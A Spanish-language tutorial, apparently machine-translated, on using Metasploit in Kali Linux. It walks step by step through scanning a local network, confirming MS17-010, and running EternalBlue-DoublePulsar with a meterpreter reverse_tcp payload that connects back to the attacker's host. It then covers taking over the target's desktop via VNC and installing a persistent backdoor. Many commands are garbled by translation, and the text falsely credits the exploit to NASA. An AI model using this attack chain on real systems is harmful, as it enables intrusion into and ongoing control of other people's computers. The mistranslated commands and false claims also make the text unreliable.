metasploit

Tutorial de Metasploit

Tutorial de Metasploit

Como hemos discutido el TOP 25 MEJOR HERRAMIENTA KALI LINUX, y colocamos a METASPLOIT al principio de la lista, ahora discutamos y aprendamos sobre METASPLOIT. Le recomendamos que esté familiarizado con Metasploit.

Metasploit creado inicialmente por H. D Moore en 2003, hasta que Rapid7 lo adquirió y desarrolló el 21 de octubre de 2009. Metasploit-framework está completamente escrito usando Ruby, y es un paquete estándar instalado en el sistema Kali Linux (y también en casi todos los sistemas operativos de Penetration Testing, supongo). Es un kit favorito de piratas informáticos o probadores de penetración para investigar vulnerabilidades de seguridad, desarrollar y ejecutar exploits en objetivos y otros desarrollos de seguridad.

Metasploit viene con varias ediciones, generalmente divididas en dos categorías, versión gratuita y versión de pago. Las versiones gratuitas: Metasploit Framework Community Edition (interfaz basada en CLI) y Armitage (interfaz basada en GUI). Las versiones pagas: Metasploit Express, Metasploit Pro y Cobalt Strike (es similar a Armitage, que es proporcionada por Strategic Cyber ​​LLC).

Metasploit permite a los usuarios crear (o desarrollar) su propio código de explotación, pero no se preocupe si no sabe cómo codificar, Metasploit tiene muchos módulos y se actualizan continuamente. Actualmente, Metasploit tiene más de 1600 exploits y 500 cargas útiles. La forma más sencilla de entender qué son exploits y payloads, un exploit es básicamente cómo el atacante entrega la carga útil, a través del agujero de vulnerabilidad del sistema objetivo.  Una vez que el atacante lanza el exploit que contiene una carga útil contra el objetivo vulnerable, luego se implementa la carga útil (la carga útil se usa para conectarse de nuevo al atacante para obtener acceso remoto contra el sistema objetivo), en esta etapa, el exploit se realiza y se vuelve irrelevante.

"Metasploit no está pirateando una herramienta instantánea, es un marco loco"

Este artículo de Metasploit trata sobre la realización de pruebas de penetración contra un sistema objetivo utilizando el siguiente flujo:


PREPARACIÓN

Asegúrese de que nuestro Kali Linux tenga la última versión actualizada. Habrá mejoras en cada actualización. Ejecute los siguientes comandos:

~ # actualización de apt
~ # actualización de apt -y
~ # apt dist-upgrade -y

Una vez que nuestra máquina esté actualizada, ahora comencemos por encender la consola de metasploit. En la terminal, escriba:

~ # msfconsole

Y también necesita cualquier editor de texto, Gedit o Leafpad, para recopilar información a lo largo del camino antes de compilar el ataque. En primer lugar, identifique su dirección IP de la interfaz inalámbrica, la IP del enrutador y la máscara de red.

Según la información anterior, anotamos la WLAN1 y la dirección IP del enrutador, y la máscara de red. Entonces, la nota debería verse así:

IP del atacante (LHOST): 192.168.1.56
Puerta de enlace / IP del enrutador: 192.168.1.1
Máscara de red: 255.255.255.0 (/ 24)


PASO 1: ESCANEO DE VULNERABILIDADES

En la consola de metasploit, primero recopilamos información, como la dirección IP de destino, el sistema operativo, los puertos abiertos y la vulnerabilidad. Metasploit nos permite ejecutar NMap directamente desde la consola. Según la información anterior, ejecute este comando para realizar nuestra tarea de recopilación de información.

msf> nmap -v 192.168.1.1/24 --script vuln -Pn -O

Desde el comando de arriba obtuvimos el resultado a continuación.

Tenemos un objetivo vulnerable que ejecuta el sistema operativo Windows, y el vulnerable está en el servicio SMBv1. Entonces, agrega a la nota.

IP de destino (RHOST): 192.168.1.57
Vulnerabilidad: vulnerabilidad de ejecución remota de código en servidores Microsoft SMBv1 (ms17-010)


PASO 2: EVALUACIÓN DE VULNERABILIDAD

Ahora conocemos el objetivo y su vulnerabilidad. Comprobemos la vulnerabilidad en la consola de metasploit

Ahora conocemos el objetivo y su vulnerabilidad. Comprobemos la vulnerabilidad en la consola de metasploit usando el módulo auxiliar smb_scanner. Ejecute el siguiente comando:

msf> use auxiliar / scanner / smb / smb_ms17_010
auxiliar de msf (smb_ms17_010)> establecer RHOSTS [IP de destino]
auxiliar de msf (smb_ms17_010)> ejecutar

Metasploit confía en la vulnerabilidad y muestra la edición exacta del sistema operativo Windows. Agregar a la nota:

SO de destino: Windows 7 Ultimate 7600


PASO 3: EXPLOTAR

Desafortunadamente, metasploit no tiene un módulo de explotación relacionado con esta vulnerabilidad. Pero no te preocupes, hay un tipo afuera expuesto y escribió el código de explotación. El exploit es familiar, ya que fue iniciado por la NASA y se llama EternalBlue-DoublePulsar. Puede obtenerlo desde aquí, o puede seguir la guía del video tutorial a continuación para instalar el código de explotación en su marco de metasploit.

Una vez que haya seguido la guía anterior (asegúrese de que la ruta sea la misma que la del tutorial). Ahora, estás listo para explotar el objetivo. Ejecute los siguientes comandos:

use exploit / windows / smb / eternalblue_doublepulsar
establecer ventanas de carga útil / meterpreter / reverse_tcp
establecer PROCESSINJECT spoolsv.exe
establecer RHOST 192.168.1.57
establecer LHOST 192.168.1.56

Explotar

Boom ... El exploit tiene éxito, tenemos una sesión de meterpreter. Como mencioné anteriormente, una vez que se lance el exploit, desplegará la carga útil, que es, aquí usamos, windows /metropreter/ reverse_tcp.


PASO 4: OBTENER ACCESO REMOTO

Exploremos los comandos más disponibles, ingrese '?'(sin signo de interrogación) y vea los comandos disponibles enumerados. La Stdapi, Los comandos del sistema son:

Para ver más información sobre el sistema de destino, utilice 'sysinfo'comando. La salida debería verse así.

Dado que inyectamos al proceso del sistema antes (spoolsv.exe), tenemos privilegios del sistema. Somos dueños del objetivo. Podemos hacer mucho con el comando al objetivo. Por ejemplo, podríamos ejecutar RDP o simplemente configurar VNC remoto. Para ejecutar el servicio VNC, ingrese el comando:

~ # ejecutar vnc

El resultado debería ser el escritorio de la máquina de destino, se ve así.

La parte más importante es crear una puerta trasera, por lo que cada vez que el objetivo se desconecta de nuestra máquina, la máquina objetivo intentará conectarse de nuevo a nosotros. La puerta trasera se usa para mantener el acceso, es como pescar, no arrojarás tu pez al agua una vez que lo tengas, ¿verdad?? Quiere hacer algo con el pescado, ya sea para guardarlo en el refrigerador para otras acciones, como cocinarlo o venderlo por dinero.

Meterpreter tiene esta función de puerta trasera persistente. Ejecute el siguiente comando y observe los parámetros y argumentos disponibles.

meterpreter> ejecutar persistencia -h

Si no se siente cómodo con este script obsoleto, el módulo de persistencia más nuevo se encuentra en publicar / windows / administrar / persistence_exe. Puedes explorarlo más por ti mismo.

Metasploit es enorme, no es solo una herramienta, es un marco, considere que tiene más de 1600 exploits y alrededor de 500 cargas útiles. Un artículo es adecuado para el panorama general del uso o idea general. Pero has aprendido mucho de este artículo.

"Cuanto más sigas el flujo de ataque, más desafío tendrás sin esfuerzo."

Vulkan para usuarios de Linux
Con cada nueva generación de tarjetas gráficas, vemos que los desarrolladores de juegos superan los límites de la fidelidad gráfica y se acercan un pa...
OpenTTD frente a Simutrans
Crear su propia simulación de transporte puede ser divertido, relajante y extremadamente atractivo. Es por eso que debes asegurarte de probar tantos j...
Tutorial de OpenTTD
OpenTTD es uno de los juegos de simulación empresarial más populares que existen. En este juego, necesitas crear un maravilloso negocio de transporte....